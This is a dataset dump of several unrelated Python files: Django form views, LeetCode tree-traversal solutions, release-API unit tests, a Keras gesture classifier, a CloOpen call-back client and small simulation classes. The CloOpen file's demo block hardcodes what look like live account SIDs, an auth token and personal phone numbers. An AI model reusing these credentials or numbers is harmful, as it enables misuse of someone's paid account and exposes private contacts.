'.join(sorted(errors)))\n\n return data_fields\n\n\nclass XmlSlugField(forms.SlugField):\n default_validators = [\n validate_slug,\n RegexValidator(\n re.compile(r'^(?!xml)', flags=re.IGNORECASE),\n _('Properties cannot begin with \"xml\"'), 'invalid_xml'\n )\n ]\n\n\nclass CustomDataFieldForm(forms.Form):\n \"\"\"\n Sub-form for editing an individual field's definition.\n \"\"\"\n label = forms.CharField(\n required=True,\n error_messages={'required': _('All fields are required')}\n )\n slug = XmlSlugField(\n required=True,\n error_messages={\n 'required': _(\"All fields are required\"),\n 'invalid': _(\"Key fields must consist only of letters, numbers, \"\n \"underscores or hyphens.\")\n }\n )\n is_required = forms.BooleanField(required=False)\n choices = forms.CharField(widget=forms.HiddenInput, required=False)\n\n def __init__(self, raw, *args, **kwargs):\n # Pull the raw_choices out here, because Django incorrectly\n # serializes the list and you can't get it\n self._raw_choices = filter(None, raw.get('choices', []))\n super(CustomDataFieldForm, self).__init__(raw, *args, **kwargs)\n\n def clean_choices(self):\n return self._raw_choices\n\n\nclass CustomDataFieldsMixin(object):\n \"\"\"\n Provides the interface for editing the ``CustomDataFieldsDefinition``\n for each entity type.\n Each entity type must provide a subclass of this mixin.\n \"\"\"\n urlname = None\n template_name = \"custom_data_fields/custom_data_fields.html\"\n field_type = None\n entity_string = None # User, Group, Location, Product...\n\n @classmethod\n def get_validator(cls, domain):\n data_model = CustomDataFieldsDefinition.get_or_create(domain, cls.field_type)\n return data_model.get_validator(cls)\n\n @classmethod\n def page_name(cls):\n return _(\"Edit {} Fields\").format(cls.entity_string)\n\n def get_definition(self):\n return CustomDataFieldsDefinition.get_or_create(self.domain,\n self.field_type)\n\n def get_custom_fields(self):\n definition = self.get_definition()\n if definition:\n return definition.fields\n else:\n return []\n\n def save_custom_fields(self):\n definition = self.get_definition() or CustomDataFieldsDefinition()\n definition.field_type = self.field_type\n definition.domain = self.domain\n definition.fields = [\n self.get_field(field)\n for field in self.form.cleaned_data['data_fields']\n ]\n definition.save()\n\n def get_field(self, field):\n return CustomDataField(\n slug=field.get('slug'),\n is_required=field.get('is_required'),\n label=field.get('label'),\n choices=field.get('choices'),\n )\n\n @property\n def page_context(self):\n return {\n \"custom_fields\": json.loads(self.form.data['data_fields']),\n \"custom_fields_form\": self.form,\n }\n\n @property\n @memoized\n def form(self):\n if self.request.method == \"POST\":\n return CustomDataFieldsForm(self.request.POST)\n else:\n serialized = json.dumps([field.to_json()\n for field in self.get_custom_fields()])\n return CustomDataFieldsForm({'data_fields': serialized})\n\n def post(self, request, *args, **kwargs):\n if self.form.is_valid():\n self.save_custom_fields()\n return self.get(request, success=True, *args, **kwargs)\n else:\n return self.get(request, *args, **kwargs)\n\n\ndef add_prefix(field_dict):\n \"\"\"\n Prefix all keys in the dict with the defined\n custom data prefix (such as data-field-whatevs).\n \"\"\"\n return {\n \"{}-{}\".format(CUSTOM_DATA_FIELD_PREFIX, k): v\n for k, v in field_dict.iteritems()\n }\n\n\ndef _make_field(field):\n if field.choices:\n return forms.ChoiceField(\n label=field.label,\n required=field.is_required,\n choices=[('', _('Select one'))] + [(c, c) for c in field.choices],\n )\n return forms.CharField(label=field.label, required=field.is_required)\n\n\nclass CustomDataEditor(object):\n \"\"\"\n Tool to edit the data for a particular entity, like for an individual user.\n \"\"\"\n def __init__(self, field_view, domain, existing_custom_data=None,\n post_dict=None, required_only=False):\n self.field_view = field_view\n self.domain = domain\n self.existing_custom_data = existing_custom_data\n self.required_only = required_only\n self.form = self.init_form(post_dict)\n\n @property\n @memoized\n def model(self):\n definition = CustomDataFieldsDefinition.get_or_create(\n self.domain,\n self.field_view.field_type,\n )\n return definition or CustomDataFieldsDefinition()\n\n def is_valid(self):\n return self.form.is_valid()\n\n def get_data_to_save(self):\n cleaned_data = self.form.cleaned_data\n self.existing_custom_data = None\n self.form = self.init_form(add_prefix(cleaned_data))\n self.form.is_valid()\n return cleaned_data\n\n def init_form(self, post_dict=None):\n fields = {\n field.slug: _make_field(field) for field in self.model.fields\n if not self.required_only or field.is_required\n }\n field_names = fields.keys()\n\n CustomDataForm = type('CustomDataForm', (forms.Form,), fields)\n CustomDataForm.helper = FormHelper()\n CustomDataForm.helper.form_tag = False\n CustomDataForm.helper.layout = Layout(\n Fieldset(\n _(\"Additional Information\"),\n *field_names\n ) if self.model.fields else '',\n self.get_uncategorized_form(field_names),\n )\n CustomDataForm._has_uncategorized = bool(\n self.get_uncategorized_form(field_names)\n )\n\n if post_dict:\n fields = post_dict\n elif self.existing_custom_data is not None:\n fields = add_prefix(self.existing_custom_data)\n else:\n fields = None\n\n self.form = CustomDataForm(fields, prefix=CUSTOM_DATA_FIELD_PREFIX)\n return self.form\n\n def get_uncategorized_form(self, field_names):\n\n def FakeInput(val):\n return HTML('{}'\n .format(val))\n\n def Label(val):\n return HTML(''.format(val))\n\n def _make_field_div(slug, val):\n return Div(\n Label(slug),\n Div(\n FakeInput(val),\n css_class=\"controls\",\n ),\n css_class=\"control-group\",\n )\n\n help_div = [\n _make_field_div(slug, val)\n for slug, val in self.existing_custom_data.items()\n if slug not in field_names\n ] if self.existing_custom_data is not None else []\n\n msg = \"\"\"\n Warning!\n This data is not part of the specified user fields and will be\n deleted if you save.\n You can add them here to prevent this.\n \"\"\".format(reverse(\n self.field_view.urlname, args=[self.domain]\n ))\n\n return Fieldset(\n _(\"Unrecognized Information\"),\n Div(\n HTML(msg),\n css_class=\"alert alert-error\",\n ),\n *help_div\n ) if len(help_div) else HTML('')\n","sub_path":"corehq/apps/custom_data_fields/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"572107639","text":"# https://leetcode-cn.com/problems/n-ary-tree-level-order-traversal/\n\n'''\n法1: 利用 队列 实现广度优先搜索\n\n时间复杂度:O(n)。n 指的是节点的数量。\n空间复杂度:O(n)。\n\n我们要构造一个 sub-lists 列表, 其中每个sub-list 是树中一行的值\n行应该按从上到下的顺序排列\n\n因为我们从根节点开始遍历树, 然后向下搜索最接近根节点的节点, 这是广度优先搜索\n我们适用队列来进行广度优先搜索, 队列具有先进先出的特性\n\n!!!!!在这里使用栈是错误的选择, 栈应用于深度优先搜索\n\n# 详细图片讲解: https://leetcode-cn.com/problems/n-ary-tree-level-order-traversal/solution/ncha-shu-de-ceng-xu-bian-li-by-leetcode/\n我们可以看到它从左到右, 并且从上到下顺序遍历节点\n\n下一步: 研究如何在这个算法基础上保存每一层的列表,并且在根节点为空时正常工作\n\n再构造下一层的列表时,我们需要创建新的子列表,然后将该层的所有节点的值插入到列表中。\n一个很好的方法时在 while 循环体开始时记录队列的当前大小 size。\n然后用另一个循环来处理 size 数量的节点。这样可以保证 while 循环在每一次迭代处理一层。\n\n使用队列十分重要,如果使用 Vector,List,Array 的话,我们删除元素需要 O(n) 的时间复杂度。\n而队列删除元素只需要 O(1) 的时间。\n\n'''\nimport collections\nfrom typing import List\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\nclass Solution:\n def levelOrder(self, root: 'Node') -> List[List[int]]:\n if root is None:\n return []\n result = []\n queue = collections.deque([root])\n while queue:\n level = []\n for _ in range(len(queue)):\n node = queue.popleft()\n level.append(node.val)\n queue.extend(node.children)\n result.append(level)\n return result\n\n\n'''\n法2: 简化的广度优先搜索\n\n时间复杂度:O(n)。n 指的是节点的数量。\n空间复杂度:O(n),我们的列表包含所有节点。\n'''\n\n\nclass Solution:\n def levelOrder(self, root: 'Node') -> List[List[int]]:\n if root is None:\n return []\n\n result = []\n previous_layer = [root]\n\n while previous_layer:\n current_layer = []\n result.append([])\n for node in previous_layer:\n result[-1].append(node.val)\n current_layer.extend(node.children)\n previous_layer = current_layer\n return result\n\n'''\n法3: 递归\n\n我们可以使用递归来解决这个问题,通常我们不能使用递归进行广度优先搜索。\n这是因为广度优先搜索基于队列,而递归运行时使用堆栈,适合深度优先搜索。\n\n'''\n\nclass Solution:\n def levelOrder(self, root: 'Node') -> List[List[int]]:\n def traverse_node(node, level):\n if len(result) == level:\n result.append([])\n result[level].append(node.val)\n for child in node.children:\n traverse_node(child, level + 1)\n\n result = []\n if root is not None:\n traverse_node(root, 0)\n return result\n\n# 链接:https://leetcode-cn.com/problems/n-ary-tree-level-order-traversal/solution/ncha-shu-de-ceng-xu-bian-li-by-leetcode/\n\n\n\n\n","sub_path":"Week_02/429_中等_N叉树的层序遍历_n-ary-tree-level-order-traversal.py","file_name":"429_中等_N叉树的层序遍历_n-ary-tree-level-order-traversal.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"506613298","text":"import mock\nimport simplejson as json\n\nfrom sqlalchemy import select\n\nfrom auslib.admin.base import db\nfrom auslib.test.admin.views.base import ViewTest, JSONTestMixin, HTMLTestMixin\n\nclass TestReleasesAPI_JSON(ViewTest, JSONTestMixin):\n def testReleasePost(self):\n data = json.dumps(dict(detailsUrl='blah', fakePartials=True))\n ret = self._post('/releases/d', data=dict(data=data, product='d', version='d', data_version=1))\n self.assertStatusCode(ret, 200)\n ret = select([db.releases.data]).where(db.releases.name=='d').execute().fetchone()[0]\n self.assertEqual(json.loads(ret), json.loads(\"\"\"\n{\n \"name\": \"d\",\n \"detailsUrl\": \"blah\",\n \"fakePartials\": true,\n \"platforms\": {\n \"p\": {\n \"locales\": {\n \"d\": {\n \"complete\": {\n \"filesize\": 1234\n }\n }\n }\n }\n }\n}\n\"\"\"))\n\n def testReleasePostCreatesNewRelease(self):\n data = json.dumps(dict(bouncerProducts=dict(linux='foo'), name='e'))\n ret = self._post('/releases/e', data=dict(data=data, product='e', version='e'))\n self.assertStatusCode(ret, 201)\n ret = db.releases.t.select().where(db.releases.name=='e').execute().fetchone()\n self.assertEqual(ret['product'], 'e')\n self.assertEqual(ret['version'], 'e')\n self.assertEqual(ret['name'], 'e')\n self.assertEqual(json.loads(ret['data']), json.loads(\"\"\"\n{\n \"name\": \"e\",\n \"schema_version\": 1,\n \"bouncerProducts\": {\n \"linux\": \"foo\"\n }\n}\n\"\"\"))\n\n def testReleasePostInvalidKey(self):\n data = json.dumps(dict(foo=1))\n ret = self._post('/releases/a', data=dict(data=data))\n self.assertStatusCode(ret, 400)\n\n def testLocalePut(self):\n data = json.dumps(dict(complete=dict(filesize=435)))\n ret = self._put('/releases/a/builds/p/l', data=dict(data=data, product='a', version='a', data_version=1))\n self.assertStatusCode(ret, 201)\n self.assertEqual(ret.data, json.dumps(dict(new_data_version=2)), \"Data: %s\" % ret.data)\n ret = select([db.releases.data]).where(db.releases.name=='a').execute().fetchone()[0]\n self.assertEqual(json.loads(ret), json.loads(\"\"\"\n{\n \"name\": \"a\",\n \"platforms\": {\n \"p\": {\n \"locales\": {\n \"l\": {\n \"complete\": {\n \"filesize\": 435\n }\n }\n }\n }\n }\n}\n\"\"\"))\n\n def testLocalePutForNewRelease(self):\n data = json.dumps(dict(complete=dict(filesize=678)))\n ret = self._put('/releases/e/builds/p/a', data=dict(data=data, product='e', version='e'))\n self.assertStatusCode(ret, 201)\n self.assertEqual(ret.data, json.dumps(dict(new_data_version=2)), \"Data: %s\" % ret.data)\n ret = select([db.releases.data]).where(db.releases.name=='e').execute().fetchone()[0]\n self.assertEqual(json.loads(ret), json.loads(\"\"\"\n{\n \"name\": \"e\",\n \"schema_version\": 1,\n \"platforms\": {\n \"p\": {\n \"locales\": {\n \"a\": {\n \"complete\": {\n \"filesize\": 678\n }\n }\n }\n }\n }\n}\n\"\"\"))\n\n def testLocalePutAppend(self):\n data = json.dumps(dict(partial=dict(fileUrl='abc')))\n ret = self._put('/releases/d/builds/p/g', data=dict(data=data, product='d', version='d', data_version=1))\n self.assertStatusCode(ret, 201)\n self.assertEqual(ret.data, json.dumps(dict(new_data_version=2)), \"Data: %s\" % ret.data)\n ret = select([db.releases.data]).where(db.releases.name=='d').execute().fetchone()[0]\n self.assertEqual(json.loads(ret), json.loads(\"\"\"\n{\n \"name\": \"d\",\n \"platforms\": {\n \"p\": {\n \"locales\": {\n \"d\": {\n \"complete\": {\n \"filesize\": 1234\n }\n },\n \"g\": {\n \"partial\": {\n \"fileUrl\": \"abc\"\n }\n }\n }\n }\n }\n}\n\"\"\"))\n\n def testLocalePutWithCopy(self):\n data = json.dumps(dict(partial=dict(filesize=123)))\n data = dict(data=data, product='a', version='a', copyTo=json.dumps(['ab']), data_version=1)\n ret = self._put('/releases/a/builds/p/l', data=data)\n self.assertStatusCode(ret, 201)\n self.assertEqual(ret.data, json.dumps(dict(new_data_version=2)), \"Data: %s\" % ret.data)\n ret = select([db.releases.data]).where(db.releases.name=='a').execute().fetchone()[0]\n self.assertEqual(json.loads(ret), json.loads(\"\"\"\n{\n \"name\": \"a\",\n \"platforms\": {\n \"p\": {\n \"locales\": {\n \"l\": {\n \"partial\": {\n \"filesize\": 123\n }\n }\n }\n }\n }\n}\n\"\"\"))\n ret = select([db.releases.data]).where(db.releases.name=='ab').execute().fetchone()[0]\n self.assertEqual(json.loads(ret), json.loads(\"\"\"\n{\n \"name\": \"ab\",\n \"platforms\": {\n \"p\": {\n \"locales\": {\n \"l\": {\n \"partial\": {\n \"filesize\": 123\n }\n }\n }\n }\n }\n}\n\"\"\"))\n\n def testLocalePutChangeVersion(self):\n data = json.dumps(dict(extv='b'))\n ret = self._put('/releases/a/builds/p/l', data=dict(data=data, product='a', version='b', data_version=1))\n self.assertStatusCode(ret, 201)\n self.assertEqual(ret.data, json.dumps(dict(new_data_version=3)), \"Data: %s\" % ret.data)\n ret = select([db.releases.data]).where(db.releases.name=='a').execute().fetchone()[0]\n self.assertEqual(json.loads(ret), json.loads(\"\"\"\n{\n \"name\": \"a\",\n \"platforms\": {\n \"p\": {\n \"locales\": {\n \"l\": {\n \"extv\": \"b\"\n }\n }\n }\n }\n}\n\"\"\"))\n newVersion = select([db.releases.version]).where(db.releases.name=='a').execute().fetchone()[0]\n self.assertEqual(newVersion, 'b')\n\n def testLocalePutBadJSON(self):\n ret = self._put('/releases/a/builds/p/l', data=dict(data='a', product='a', version='a'))\n self.assertStatusCode(ret, 400)\n\n def testLocaleGet(self):\n ret = self._get('/releases/d/builds/p/d')\n self.assertStatusCode(ret, 200)\n self.assertEqual(json.loads(ret.data), dict(complete=dict(filesize=1234)))\n self.assertEqual(ret.headers['X-Data-Version'], '1')\n\n def testLocalePutNotAllowed(self):\n ret = self.client.put('/releases/d/builds/p/d', data=dict(product='a'))\n self.assertStatusCode(ret, 401)\n\n def testLocalePutCantChangeProduct(self):\n data = json.dumps(dict(complete=dict(filesize=435)))\n ret = self._put('/releases/a/builds/p/l', data=dict(data=data, product='b', version='a'))\n self.assertStatusCode(ret, 400)\n\n def testLocaleRevertsPartialUpdate(self):\n data = json.dumps(dict(complete=dict(filesize=1)))\n with mock.patch('auslib.admin.base.db.releases.addLocaleToRelease') as r:\n r.side_effect = Exception(\"Fail\")\n ret = self._put('/releases/a/builds/p/l', data=dict(data=data, product='a', version='c', data_version=1))\n self.assertStatusCode(ret, 500)\n ret = db.releases.t.select().where(db.releases.name=='a').execute().fetchone()\n self.assertEqual(ret['product'], 'a')\n self.assertEqual(ret['version'], 'a')\n self.assertEqual(json.loads(ret['data']), dict(name='a'))\n\n # Test get of a release's full data column, queried by name\n def testGetSingleReleaseBlob(self):\n ret = self._get(\"/releases/d/data\")\n self.assertStatusCode(ret, 200)\n self.assertEqual(json.loads(ret.data), json.loads(\"\"\"\n{\n \"name\": \"d\",\n \"platforms\": {\n \"p\": {\n \"locales\": {\n \"d\": {\n \"complete\": {\n \"filesize\": 1234\n }\n }\n }\n }\n }\n}\n\"\"\"), msg=ret.data)\n\n\nclass TestReleasesAPI_HTML(ViewTest, HTMLTestMixin):\n\n def testGetReleases(self):\n ret = self._get(\"/releases.html\")\n self.assertStatusCode(ret, 200)\n self.assertTrue('' in ret.data, msg=ret.data)\n\n # Test get of a release's full data column, queried by name\n def testGetSingleRelease(self):\n ret = self._get(\"/releases/d\")\n self.assertStatusCode(ret, 200)\n self.assertTrue(\"\" in ret.data, msg=ret.data)\n\n def testNewReleasePut(self):\n\n ret = self._put('/releases/new_release', data=dict(name='new_release', version='11', product='Firefox',\n blob=\"\"\"\n{\n \"name\": \"a\",\n \"platforms\": {\n \"p\": {\n \"locales\": {\n \"l\": {\n }\n }\n }\n }\n}\n\"\"\"))\n \n #json.dumps(newReleaseFile.getvalue())))\n self.assertEquals(ret.status_code, 201, \"Status Code: %d, Data: %s\" % (ret.status_code, ret.data))\n r = db.releases.t.select().where(db.releases.name=='new_release').execute().fetchall()\n self.assertEquals(len(r), 1)\n self.assertEquals(r[0]['name'], 'new_release')\n self.assertEquals(r[0]['version'], '11')\n self.assertEquals(r[0]['product'], 'Firefox')\n self.assertEquals(json.loads(r[0]['data']), json.loads(\"\"\"\n{\n \"name\": \"a\",\n \"platforms\": {\n \"p\": {\n \"locales\": {\n \"l\": {\n }\n }\n }\n }\n}\n\"\"\"))\n\n","sub_path":"auslib/test/admin/views/test_releases.py","file_name":"test_releases.py","file_ext":"py","file_size_in_byte":9896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"149941948","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 29 11:59:20 2018\n\n@author: jai\n\"\"\"\n\nfrom keras.models import Sequential\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.convolutional import MaxPooling2D\nfrom keras.layers.core import Activation\nfrom keras.layers.core import Flatten\nfrom keras.layers.core import Dense\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.optimizers import Adam\nfrom sklearn.model_selection import train_test_split\nfrom keras.preprocessing.image import img_to_array\nfrom keras.utils import to_categorical\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport os\nimport imutils\n\n\nEPOCHS = 10\nINIT_LR = 1e-3\nBS = 2\n\nmodel = Sequential()\ninputShape = (28, 28, 1)\n \nmodel.add(Conv2D(20, (5, 5), padding=\"same\",\tinput_shape=inputShape))\nmodel.add(Activation(\"relu\"))\nmodel.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n\nmodel.add(Conv2D(50, (5, 5), padding=\"same\"))\nmodel.add(Activation(\"relu\"))\nmodel.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n\n# first (and only) set of FC => RELU layers\nmodel.add(Flatten())\nmodel.add(Dense(500))\nmodel.add(Activation(\"relu\"))\n\n# softmax classifier\nmodel.add(Dense(2))\nmodel.add(Activation(\"softmax\")) \n\n\n#Capture images\ndef capture_image():\n video = cv2.VideoCapture(0)\n bbox_initial = (100, 100, 200, 200)\n bbox = bbox_initial\n \n while True:\n success, frame = video.read()\n display = frame.copy()\n p1 = (int(bbox[0]), int(bbox[1]))\n p2 = (int(bbox[0] + bbox[2]), int(bbox[1] + bbox[3]))\n cv2.rectangle(frame, p1, p2, (255, 0, 0), 2, 1)\n \n roi = frame[100:300, 100:300]\n \n \n if not success:\n break\n \n cv2.imshow(\"frame\", frame)\n \n k = cv2.waitKey(1) & 0xff\n if k == 27:# escape pressed \n break\n elif k == 115: # s pressed\n fname = input(\"File name\")\n cv2.imwrite('{}.jpg'.format(fname), roi)\n \n \n \ncv2.destroyAllWindows()\nvideo.release()\n\nbg_img = cv2.imread('bg_black.jpg')\n\ncurrent_frame_img = cv2.imread('current.jpg')\n\ndef preprocess_image_v2(current_frame_img, bg_img):\n blur = cv2.GaussianBlur(current_frame_img, (15, 15), 2)\n hsv = cv2.cvtColor(blur, cv2.COLOR_BGR2HSV)\n lower = np.array([0,50,50])\n upper = np.array([180,140,180])\n mask = cv2.inRange(hsv, lower, upper)\n masked_img = cv2.bitwise_and(current_frame_img, current_frame_img, mask=mask)\n diff = cv2.absdiff(bg_img, masked_img)\n mask2 = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)\n th, mask_thresh = cv2.threshold(mask2, 10, 255, cv2.THRESH_BINARY)\n return mask_thresh\n \n\ndef preprocess_image(current_frame_img, bg_img):\n diff = cv2.absdiff(bg_img, current_frame_img)\n mask = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)\n th, mask_thresh = cv2.threshold(mask, 10, 255, cv2.THRESH_BINARY)\n plot_image(mask_thresh)\n return mask_thresh\n\ndef bgrtorgb(image):\n return cv2.cvtColor(image.copy(), cv2.COLOR_BGR2RGB)\n\n\ndef plot_image(image, figsize=(8,8), recolour=False):\n if image.shape[-1] == 1 or len(image.shape) == 2:\n plt.imshow(image, cmap='gray')\n else:\n raise Exception(\"Image has invalid shape.\")\n\nmask_thresh = preprocess_image(current_frame_img, bg_img)\nplot_image(mask_thresh)\nmasked = cv2.resize(mask_thresh, (300, 300))\n\nplot_image(masked)\n\npath=os.getcwd()+'/'\nprint(path)\n\ndata = []\nlabels = []\n \nfor img in os.listdir(path):\n print(img)\n image = cv2.imread(img)\n image = preprocess_image_v2(image, bg_img)\n image = cv2.resize(image, (28, 28))\n image = img_to_array(image)\n data.append(image)\n \n label = img.rstrip('0123456789')\n label = img.split('.')[0]\n print(label[:4])\n label = 1 if label[:4] == \"five\" else 0\n labels.append(label)\n \ndata = np.array(data, dtype=\"float\") / 255.0\nlabels = np.array(labels)\n \n(trainX, testX, trainY, testY) = train_test_split(data, labels, \n test_size=0.25, random_state=42)\n \ntrainY = to_categorical(trainY, num_classes=2)\ntestY = to_categorical(testY, num_classes=2) \n\naug = ImageDataGenerator(rotation_range=30, width_shift_range=0.1,\n\theight_shift_range=0.1, shear_range=0.2, zoom_range=0.2,\n\thorizontal_flip=True, fill_mode=\"nearest\")\n\nopt = Adam(lr=INIT_LR, decay=INIT_LR / EPOCHS)\nmodel.compile(loss=\"binary_crossentropy\", optimizer=opt,\n\tmetrics=[\"accuracy\"])\n \n# train the network\nprint(\"[INFO] training network...\")\nH = model.fit_generator(aug.flow(trainX, trainY, batch_size=BS),\n\tvalidation_data=(testX, testY), steps_per_epoch=len(trainX) // BS,\n\tepochs=EPOCHS, verbose=1)\n\nprint(\"[INFO] training network...\")\nH=model.fit(trainX, trainY,\n\tvalidation_data=(testX, testY), steps_per_epoch=len(trainX) // BS,\n\tepochs=EPOCHS, verbose=1, validation_steps=5)\n\n \n# save the model to disk\nprint(\"[INFO] serializing network...\")\nmodel.save(os.getcwd()[\"model\"])\n\n\n\nplt.style.use(\"ggplot\")\nplt.figure()\nN = EPOCHS\nplt.plot(np.arange(0, N), H.history[\"loss\"], label=\"train_loss\")\nplt.plot(np.arange(0, N), H.history[\"val_loss\"], label=\"val_loss\")\nplt.plot(np.arange(0, N), H.history[\"acc\"], label=\"train_acc\")\nplt.plot(np.arange(0, N), H.history[\"val_acc\"], label=\"val_acc\")\nplt.title(\"Training Loss and Accuracy on Dataset\")\nplt.xlabel(\"Epoch #\")\nplt.ylabel(\"Loss/Accuracy\")\nplt.legend(loc=\"lower left\")\n\n \n# pre-process the image for classification\ndef classify_image(image):\n image = preprocess_image_v2(image, bg_img)\n orig = image.copy()\n \n image = cv2.resize(image, (28, 28))\n \n image = image.astype(\"float\") / 255.0\n image = img_to_array(image)\n image = np.expand_dims(image, axis=0)\n \n (two, five) = model.predict(image)[0]\n \n label = \"Five\" if five > two else \"Two\"\n proba = five if five > two else two\n label = \"{}: {:.2f}%\".format(label, proba * 100)\n \n # draw the label on the image\n output = imutils.resize(orig, width=400)\n cv2.putText(output, label, (10, 25), cv2.FONT_HERSHEY_SIMPLEX,\n \t0.7, (255, 255, 255), 2)\n \n # show the output image\n cv2.imshow(\"Output\", output)\n\nimage = cv2.imread('test202.jpg')\nclassify_image(image)\n\ncapture_image()\ncv2.destroyAllWindows()\n\n","sub_path":"keras_gestures.py","file_name":"keras_gestures.py","file_ext":"py","file_size_in_byte":6221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"335829527","text":"# vim: set fileencoding=utf-8 :\n\nimport hashlib\nimport base64\nimport datetime\nimport requests\nimport json\n\nclass CloOpen:\n\n api_host = ''\n app_id = ''\n headers = {\n 'Accept': 'application/json',\n 'Content-Type': 'application/json;charset=utf-8',\n }\n\n\n def __init__(self, debug=False):\n self.debug = debug\n if self.debug:\n server_ip = 'app.cloopen.com'\n else:\n server_ip = 'app.cloopen.com'\n server_port = '8883'\n server_version = '2013-12-26'\n self.api_host = 'https://{0}:{1}/{2}'.format(server_ip, server_port, server_version)\n\n\n def init_app_id(self, app_id):\n self.app_id = app_id;\n\n\n def init_account(self, account_sid, account_token):\n self.account_sid = account_sid;\n self.account_token = account_token;\n\n\n def init_sub_account(self, sub_account_sid, sub_account_token):\n self.sub_account_sid = sub_account_sid;\n self.sub_account_token = sub_account_token;\n\n\n def log(self, url, request, response):\n print('Request URL:\\n{0}\\n'.format(url))\n print('Request Body:\\n{0}\\n'.format(request))\n print('Response Body:\\n{0}\\n'.format(response))\n print('********************************')\n\n\n def _auth_and_url(self):\n time_string = datetime.datetime.now().strftime('%Y%m%d%H%M%S')\n\n src = '{0}:{1}'.format(self.sub_account_sid, time_string)\n auth = base64.encodestring(src.encode('utf-8')).strip()\n\n signature = '{0}{1}{2}'.format(self.sub_account_sid, self.sub_account_token, time_string)\n signature = hashlib.md5(signature.encode('utf-8')).hexdigest().upper()\n url = '{host}/SubAccounts/{sid}/Calls/Callback?sig={signature}'.format(host=self.api_host, sid=self.sub_account_sid, signature=signature)\n\n return auth, url\n\n\n def action_call_back(self, caller, callee, caller_showing, callee_showing, user_data, max_call_time):\n\n body = {\n \"from\": caller,\n \"to\": callee,\n \"customerSerNum\": callee_showing,\n \"fromSerNum\": caller_showing,\n \"userData\": user_data,\n \"maxCallTime\": max_call_time,\n \"promptTone\": 'connecting2patient.wav',\n \"alwaysPlay\": 'true',\n \"countDownTime\": 60,\n \"countDownPrompt\": '1minute.wav',\n \"terminalDtmf\": None,\n \"hangupCdrUrl\": None,\n \"needBothCdr\": None,\n \"needRecord\": 1,\n \"recordPoint\": 0,\n }\n\n auth, url = self._auth_and_url()\n self.headers.update({'Authorization': auth})\n\n req = requests.post(url, data=json.dumps(body), headers=self.headers)\n\n data = req.text\n try:\n if self.debug:\n self.log(url, body, data)\n locations = json.loads(data)\n return locations\n except Exception as e:\n print(e)\n pass\n\n\nif __name__ == '__main__':\n\n app_id = '8a48b55151eb7d520151ec93ab110353'\n sub_account_sid = 'fcbd00aeadfb11e59288ac853d9f54f2'\n sub_account_token = '17369f19ec0ffff3a1d971f4fffa8e5f'\n\n # action_call_back(caller, callee, caller_showing, callee_showing, user_data, max_call_time):\n def demo(caller, callee, caller_showing, callee_showing, user_data, max_call_time):\n cloopen = CloOpen(debug=True)\n cloopen.init_app_id(app_id)\n cloopen.init_sub_account(sub_account_sid, sub_account_token)\n\n response = cloopen.action_call_back(caller, callee, caller_showing, callee_showing, user_data, max_call_time)\n status = response.get('statusCode')\n callback = response.get('CallBack')\n if status != '000000':\n print(response)\n for k, v in callback.items():\n print('%s: %s' % (k, v))\n\n\n # demo('18513852351', '13810261155', '4000686895', '4000686895')\n demo('13810261155', '18513852351', '4000686895', '4000686895', 'order-id-abc-123', 150)\n\n\n","sub_path":"project/backend-staging/src/contrib/libs/cloopen.py","file_name":"cloopen.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"35622822","text":"# Copyright 2018 WolkAbout Technology s.r.o.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nAlarm Module.\n\"\"\"\n\n\nclass Alarm:\n \"\"\"Alarm event that ocurred on device.\"\"\"\n\n def __init__(self, reference, active, timestamp=None):\n \"\"\"\n Information about alarm event.\n\n :param reference: Alarm reference\n :type reference: str\n :param active: Current state of the alarm\n :type active: bool\n :param timestamp: Unix timestamp. If not provided, platform will assign\n :type timestamp: int or None\n \"\"\"\n self.reference = reference\n self.active = active\n self.timestamp = timestamp\n","sub_path":"Alarm.py","file_name":"Alarm.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"292261781","text":"import random\n\n\nclass TreatmentFurnace:\n def __init__(self, env, allocator, num):\n self.env = env\n self.alloc = allocator\n\n self.name = 'treatment_furnace_' + str(num + 1)\n self.capacity = 300\n\n self.current_job_list = []\n print(self.name + ' :: created')\n\n def calc_treatment_time(self):\n print(self.name, ' :: calculate treatment time')\n return random.randint(30, 50)\n\n def run(self):\n while True:\n new_job_list = self.alloc.get_next_treatment_job(self.name, self.capacity)\n if new_job_list == None:\n yield self.env.timeout(10)\n continue\n # new_job['properties']['last_process'] = 'treatment_waiting'\n self.current_job_list.extend(new_job_list)\n print('debug :', self.name, self.current_job_list)\n\n print(self.env.now, self.name, ':: treatment start', self.current_job_list)\n treatment_time = self.calc_treatment_time()\n for j in self.current_job_list:\n # j['properties']['current_equip'] = self.name\n # j['properties']['last_process'] = 'treatment'\n j['properties']['last_process_end_time'] = self.env.now + treatment_time\n yield self.env.timeout(treatment_time)\n for j in self.current_job_list:\n self.alloc.end_job(j)\n # j['properties']['next_instruction'] += 1\n # if 